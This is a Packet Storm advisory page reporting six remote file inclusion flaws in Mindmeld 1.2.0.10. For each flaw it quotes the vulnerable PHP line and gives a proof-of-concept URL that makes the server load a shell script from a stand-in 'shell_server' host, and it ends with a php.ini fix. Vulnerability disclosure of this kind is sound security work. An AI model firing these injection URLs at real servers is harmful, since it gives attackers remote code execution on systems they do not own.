what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mindmeld-rfi.txt

mindmeld-rfi.txt
Posted Feb 1, 2008
Authored by David Wharton

Mindmeld version 1.2.0.10 suffers from multiple remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, code execution, file inclusion
SHA-256 | cb08573d54c2a39d2112ffb4c3706e94eaed0a4ceec242a4422c1f01b3975986

mindmeld-rfi.txt

Change Mirror Download
Summary

Mindmeld is an, "enterprise-capable knowledge-sharing system" written
in PHP. There are multiple remote file inclusion vulnerabilities in
Mindmeld version 1.2.0.10 (latest version).

Details

1. Vulnerable File and Line:

Mindmeld-1.2.0.10/acweb/admin_index.php: line 51
require_once ( $MM_GLOBALS['home']."include/utilities.inc" );

PoC:

http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell
_server/shell.php?

---
2. Vulnerable file and line:

Mindmeld-1.2.0.10/include/ask.inc.php: line 34
require_once ( $MM_GLOBALS['home'] . "interfaces
{$MM_GLOBALS['interface']}/include/" .
"interface_{$MM_GLOBALS['interface']}_ask.inc" );

PoC:

http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://
shell_server/shell.php?php?

---
3. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/learn.inc.php: line 38
require_once ( $MM_GLOBALS['home'] . "interfaces/
{$MM_GLOBALS['interface']}/include/"

PoC:

http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?

---
4. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/manage.inc.php: line 31
require_once ( $MM_GLOBALS['home'] . "interfaces/
{$MM_GLOBALS['interface']}/include/"

PoC:

http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?

---
5. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/mind.inc.php: line 33
require_once( $MM_GLOBALS['home'] . 'include/utilities.inc' );

PoC:

http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?

---
6. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/sensory.inc.php: line 70
require_once ( $MM_GLOBALS['home'] . "include/utilities.inc" );

PoC:

http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?

---
It appears that these vulnerabilities are not vulnerable to local file
includes.

These vulnerabilities have been disclosed to the vendor although
development on this software has stopped.

Sources:

http://mindmeld.sourceforge.net/

Quick Fix:

In php.ini, disable the following variables: register_globals,
allow_url_fopen, and allow_url_include.

Credit:

David Wharton


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close